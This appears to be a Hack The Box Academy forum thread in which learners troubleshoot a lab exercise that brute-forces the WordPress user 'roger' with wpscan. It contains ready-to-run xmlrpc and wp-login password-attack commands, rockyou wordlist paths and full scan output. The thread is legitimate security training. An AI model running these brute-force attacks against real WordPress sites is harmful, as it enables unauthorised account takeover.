HTB Academy - Hacking Wordpress, Attacking WordPress Users

HTB Content Academy
1

the question ist :

Perform a bruteforce attack against the user “roger” on your target with the wordlist “rockyou.txt”.

I use the command line from the example :

wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://blog.inlanefreight.com

and change the user to “roger”, the path to rockyou.txt and the URL to my target.

wpscan --password-attack xmlrpc -t 20 -U roger -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt --url www.inlanefreight.com --api-token TOKEN

the answer i get after 2 sec is : [i] No Valid Passwords Found.

when i try

wpscan --password-attack wp-login -t 20 -U roger -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt --url www.inlanefreight.com --api-token TOKEN

it goes through the passwordlist but gives me only : Error: Unknown response received Code: 403

2

Hey! The url in the command line example and this one are different. It has been a bit since I did that module, but are you sure that the www is right? Or should it be blog.inlanefreight.com?

I didn’t boot up the exercise to check, just figured I would see if that could be it.
-onthesauce

3

Hey Thanks for your reply !
I havent had the time to come back to the challenge.

Yes you are right that was not the URL that was supplied in the Module

one i got it to perform the XMLRPC password attack :

 
wpscan --password-attack xmlrpc -t 20 -U roger -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-05.txt --url http://blog.inlanefreight.com --random-user-agent --ignore-main-redirect --detection-mode aggressive --force
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://blog.inlanefreight.com/ [134.209.24.248]
[+] Started: Tue Nov  1 09:54:22 2022

Interesting Finding(s):

[+] XML-RPC seems to be enabled: http://blog.inlanefreight.com/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blog.inlanefreight.com/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blog.inlanefreight.com/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blog.inlanefreight.com/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.6.10 identified (Outdated, released on 0001-01-01).
 | Found By: Atom Generator (Aggressive Detection)
 |  - http://blog.inlanefreight.com/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="5.6.10">WordPress</generator>
 | Confirmed By: Style Etag (Aggressive Detection)
 |  - http://blog.inlanefreight.com/wp-admin/load-styles.php, Match: '5.6.10'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Aggressive Methods)
 Checking Config Backups - Time: 00:00:03 <====================================> (137 / 137) 100.00% Time: 00:00:03

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
Error: Server error, try reducing the number of threads.                                                           
Error: Server error, try reducing the number of threads.                                                           
Error: Server error, try reducing the number of threads.                                                           
Error: Server error, try reducing the number of threads.                                                           
Error: Server error, try reducing the number of threads.                                                           
Error: Server error, try reducing the number of threads.                                                           
Error: Server error, try reducing the number of threads.                                                           
Error: Server error, try reducing the number of threads.                                                           
Error: Server error, try reducing the number of threads.                                                           
Error: Server error, try reducing the number of threads.                                                           
Error: Server error, try reducing the number of threads.                                                           
Error: Server error, try reducing the number of threads.                                                           
Trying roger / 12345678 Time: 00:00:02 <=========================================> (13 / 13) 100.00% Time: 00:00:02
Error: Server error, try reducing the number of threads.                                                           

[i] No Valid Passwords Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov  1 09:54:32 2022
[+] Requests Done: 187
[+] Cached Requests: 2
[+] Data Sent: 47.776 KB
[+] Data Received: 348.837 KB
[+] Memory used: 205.691 MB
[+] Elapsed time: 00:00:09

afterwards even with the same command i allways get the reply : No Valid Passwords Found

Scan Aborted: The XML-RPC Interface was not detected.

which is strange because it worked in the first place :smiley:

1 Like
4

Got it… sorry, i had trouble with the URL …i used the IP and it worked …

5

Just to help anyone in the future.

Use the rockyou-xx.txt file to crack it - I think I got up to rockyou-35.txt or something to get his password. No need for token in this one.

(The rockyou.txt is MASSIVE file so use the shorter version just here for learning purposes. IRL I have cracked many passwords with rockyou)

6

Hi @Cyberstorm, when i run this command, " ```
wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://blog.inlanefreight.com

7

passwords.txt use rockme-xx in the Seclist folder.

And also I think your URL is not correct as I recal .com => .local

If you have not already remember to add the inlanefreight.local and blog.inlanefreight.local to your /etc/hosts file

8

Thanks, i’m following this tutorial https://www.youtube.com/watch?v=Z9QPazbfwFE and i did everything that is being done here but i do get

Scan Aborted: --passwords The path ‘/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt’ does not exist or is not a file

9

Because the password file in NOT called rockyou.txt but is split in to smaller ones like rockyou-10
-35 etc.
try to actually browse the password list folder to see what you have to work with. But rockyou.txt does 100% not work as not a file there exist on in the SecList as it is Millions of passwords and GIGA bytes of data.

don’t follow a youtube video blindly but adapt.

1 Like